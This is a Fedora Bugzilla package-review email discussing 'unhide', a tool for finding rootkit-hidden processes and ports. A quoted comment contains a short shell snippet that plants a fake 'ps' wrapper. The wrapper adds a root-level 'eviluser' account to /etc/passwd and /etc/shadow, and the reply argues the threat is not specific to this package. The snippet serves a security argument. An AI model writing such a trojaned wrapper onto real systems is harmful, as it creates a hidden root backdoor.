[Bug 469843] Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from rootkits
bugzilla at redhat.com
bugzilla at redhat.com
Mon Dec 8 20:21:55 UTC 2008
Please do not reply directly to this email. All additional
comments should be made in the comments box of this bug.
https://bugzilla.redhat.com/show_bug.cgi?id=469843
--- Comment #6 from Till Maas <opensource at till.name> 2008-12-08 15:21:54 EDT ---
(In reply to comment #5)
> To be honest, I would not run this "security application" on my system. I am
> afraid of something along
> cat >> /usr/local/bin/ps << EOF
> #! /bin/bash
> echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
> echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
> /etc/shadow
> /bin/ps $*
> EOF
/usr/local/bin is only writable by root and how does not packaging unhide
prevent you from this attack? Or do you never use ps without an absolute path
as root? Nevertheless, the attacker could also do this for any binary on the
system, not only ps.
--
Configure bugmail: https://bugzilla.redhat.com/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.
More information about the Fedora-package-review
mailing list